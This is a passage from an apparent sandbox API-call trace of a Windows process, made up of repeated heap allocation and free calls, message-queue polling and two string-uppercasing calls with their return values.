hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0087.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0087.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0087.211] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0087.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0087.211] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0087.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0087.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0087.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0087.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0087.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0087.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0087.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0087.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0087.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0087.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0087.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0087.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0087.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0087.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99a0 [0087.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0087.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9af0 [0087.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c10 [0087.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b08 [0087.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0087.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9940 [0087.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99d0 [0087.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a00 [0087.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a30 [0087.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a746b8 [0087.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0087.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b20 [0087.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b38 [0087.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9df0 [0087.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0087.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c70 [0087.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9d78 [0087.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0087.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0087.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0087.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0087.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0087.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0087.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0087.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0087.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0087.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0087.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0087.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0087.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0087.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0087.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0087.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0087.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0087.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0087.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0087.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0087.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a746b8 | out: hHeap=0x2af0000) returned 1 [0087.214] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0087.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a744c0 | out: hHeap=0x2af0000) returned 1 [0087.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.215] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0087.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0087.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0087.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0087.215] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0087.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0087.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99b8 [0087.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73f20 [0087.215] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0087.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0087.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0087.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0087.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0087.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0087.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0087.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0087.215] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0087.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0087.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0087.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0087.215] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0087.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0087.216] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0087.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0087.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0087.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0087.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0087.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73f20 | out: hHeap=0x2af0000) returned 1 [0087.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0087.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0087.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0087.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0087.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0087.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0087.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0087.217] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0087.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0087.217] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0087.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.217] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0087.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0087.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0087.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0087.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0087.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0087.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0087.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0087.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0087.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0087.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0087.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0087.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0087.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0087.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0087.217] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0087.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0087.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0087.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0087.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0087.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0087.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0087.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0087.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0087.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0087.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0087.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0087.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0087.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0087.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0087.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0087.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0087.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0087.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0087.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0087.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0087.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0087.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0087.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: 